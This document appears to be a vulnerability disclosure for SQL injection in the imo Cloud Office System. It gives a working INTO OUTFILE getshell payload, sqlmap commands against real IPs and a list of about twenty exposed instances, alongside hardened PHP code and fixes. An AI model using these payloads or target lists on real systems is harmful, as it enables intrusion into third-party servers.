Arbitrary SQL Execution Vulnerability (getshell) in the imo Cloud Office System
As titled.
At its core this is an SQL injection vulnerability. However, the application issues its queries through PDO_MySQL, which accepts stacked (semicolon-separated) statements in a single call, so the injection is equivalent to arbitrary SQL statement execution: an attacker is not limited to altering the original SELECT but can append an entirely new statement after it.
Vulnerable files and parameters:
/Customize/Audit/MessageMonitor/groupSearch.php?id=1
/Customize/Audit/MessageMonitor/mutilSearch.php?id=1
/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))
Execute a stacked SELECT ... INTO OUTFILE statement to write a file on the server (the hex literal 0x776F6F79756E2E6F7267 decodes to wooyun.org; the trailing %23 is a URL-encoded # that comments out the remainder of the original query). Writing a PHP file into the web root instead of /tmp is what turns this into a webshell (getshell); this requires the MySQL account to hold the FILE privilege and secure_file_priv to allow the target path:
http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1;select 0x776F6F79756E2E6F7267 into outfile '/tmp/wooyun.txt'%23
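The injectable pattern described above, placed next to a hardened handler. This is an added example for this page, not code from the imo cloud Office product; the function names, the `groups` table, the `IMO_*` environment variables and the DSN are assumptions for illustration. It shows why a stacked payload in `id` reaches the server as a second statement, and the three changes that close it: integer validation, a bound parameter, and connection options that refuse stacked statements.

```php
<?php
// Added example (not the imo cloud Office code). Table name, function names,
// DSN and IMO_* environment variables are assumptions for illustration.
declare(strict_types=1);

// Vulnerable: $_GET['id'] is concatenated into the SQL text. PDO_MySQL's
// query() accepts stacked statements, so a value such as
//   1;select 0x776F6F79756E2E6F7267 into outfile '/tmp/wooyun.txt'#
// is executed as a second statement after the SELECT.
function groupSearchVulnerable(PDO $pdo, string $id): array
{
    $sql = "SELECT * FROM `groups` WHERE id = $id";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate the type, bind the value, never build SQL from user bytes.
function groupSearchFixed(PDO $pdo, string $id): array
{
    // 1. Reject anything that is not a plain non-negative integer.
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be an integer');
    }
    // 2. Bind the value; the driver never interprets it as SQL.
    $stmt = $pdo->prepare('SELECT * FROM `groups` WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection options: real server-side prepares (no client-side emulation)
// and no multi-statement support, so even a remaining string-built query
// cannot carry a stacked statement. PDO::MYSQL_ATTR_MULTI_STATEMENTS needs
// PHP >= 5.5.21 / 5.6.5 built with mysqlnd. Credentials are placeholders.
function connect(): PDO
{
    $dsn  = getenv('IMO_DSN') ?: 'mysql:host=127.0.0.1;dbname=imo;charset=utf8mb4';
    $user = getenv('IMO_DB_USER') ?: 'imo';
    $pass = getenv('IMO_DB_PASS') ?: '';
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES       => false,
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false,
    ]);
}

if (PHP_SAPI === 'cli') {
    $pdo = connect();
    // The payload from the report; the hardened handler rejects it before
    // any SQL is built. Only ever point groupSearchVulnerable() at a
    // throwaway database.
    $payload = "1;select 0x776F6F79756E2E6F7267 into outfile '/tmp/wooyun.txt'#";
    try {
        groupSearchFixed($pdo, $payload);
    } catch (InvalidArgumentException $e) {
        echo "rejected: {$e->getMessage()}\n";
    }
}
```

The connection options are defence in depth rather than the fix: a bound parameter alone already stops this injection, but disabling emulated prepares and multi-statements means any other string-built query in the code base loses the stacked-query primitive too. On the database side the same report also argues for revoking FILE from the application account and setting secure_file_priv, since INTO OUTFILE is what makes a shell rather than a data leak.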
Test with sqlmap, case 1 (the trailing * marks the injection point, since uid is wrapped in two closing parentheses):
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))*" --random-agent --dbms=mysql
Test with sqlmap, case 2 (enumerate databases):
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1" --random-agent --dbms=mysql --dbs
Many Internet-facing instances of this system exist, for example:
http://124.127.184.106/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://220.249.78.238/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://221.2.165.51/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://114.112.88.208/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://61.186.41.230/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://61.128.175.188:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://120.33.48.13:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://120.33.48.12:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://116.228.58.90:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://60.2.187.226:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://60.2.41.246/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://221.5.224.65:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://58.118.64.9/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://42.49.39.72:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://114.247.46.73/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://183.64.106.66/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://219.148.143.126:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://122.10.19.52/server/page_download
http://211.142.200.34/Customize/Audit/MessageMonitor/groupSearch.php?id=1
http://221.224.21.25:8888/Customize/Audit/MessageMonitor/groupSearch.php?id=1
Solution:
Do not concatenate request parameters into SQL. Validate id and uid as integers and pass them as bound parameters of a prepared statement, with PDO prepare emulation disabled so the binding is done server-side. As defence in depth, disable multi-statement execution on the PDO connection, run the application under a MySQL account without the FILE privilege, and set secure_file_priv so that INTO OUTFILE cannot reach the web root.